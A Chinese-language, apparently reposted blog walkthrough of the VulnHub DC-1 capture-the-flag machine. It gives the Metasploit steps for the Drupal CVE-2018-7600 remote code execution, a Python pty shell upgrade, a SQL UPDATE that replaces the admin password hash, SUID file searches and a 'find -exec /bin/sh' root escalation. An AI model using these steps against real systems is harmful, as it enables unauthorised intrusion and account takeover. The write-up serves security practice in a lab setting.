本文共 1296 字，大约阅读时间需要 4 分钟。

vulnhub靶机 DC1 练习

DC靶机的内网渗透，简介里说我们要找出5个flge就算通关了

开始

靶场启动后我们内网扫一波找出靶机的ip地址，这里我们用nmap扫。

端口扫描： 这里我们访问一下开放的80端口： 在百度搜索drupal存在远程代码执行漏洞

这里我们直接用msf进行复现：

search CVE-2018-7600 搜索复现模块 use 模块路径

show options

set RHOST 目标ip

run 查看一下当前的用户权限：

whoaml

这里我们就在当前位置到到了第一个flag 查看第一个文件提示： 这里我们就找找cms的配置文件，并打开他。 这里我们就找到了第二个flag 这意思应该是要让我们提权，但是没思路，但是看到了数据库的账号密码可以连接试试。 试了几次发现登不上，去看了看别个做的，发现要先获取一个python的标准shell

python -c “import pty;pty.spawn(’/bin/bash’)”

获取标准shell后就成功登上了mysql。 接下来查看当前数据库

show databases; //查看所有数据库show tables; //查表

再进入数据库查表： 看见一个user表看看里面的数据：

select * from 表名；

查看到了账号密码看能不能替换了，但是他的密码是经过加密的用了该cms特有的hash算法。接下来找hash加密文件。 把加密下来的密码复制现在替换掉数据库里面的密码

update users set pass="$S$DsilJYj0DZUjqVvQBVt72POhIUf/Wh9rj1f6pjDrznjcfhJLzJ29" where name="admin";

修改后直接登录。

可以在这里面发现flag3： flag4就在home目录里，打开就行了。 这里的提示大概就是线索在root目录里面但是没有权限。 果然没有，这里就需要提权了。我这里使用suid提权。 已知的可用来提权的linux可行性的文件列表如下：

Nmap

Vim

find

Bash

More

Less

Nano

cp

以下命令可以发现系统上运行的所有SUID可执行文件。

#以下命令将尝试查找具有root权限的SUID的文件，不同系统适用于不同的命令，一个一个试find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000-print2>/dev/nullfind / -user root -perm -4000-exec ls -ldb {
   } \

我们来查看是root权限运行的文件：

发现能利用的只有/usr/bin/find，确认一下是不是root权限运行。

ls -lh /usr/bin/find

确认是root权限后执行以下命令；

find ./ aaa -exec '/bin/sh' \;

获取root权限后就可以打开root文件里找到最后一个flga了。

结束！！！！！！

转载地址：http://haywi.baihongyu.com/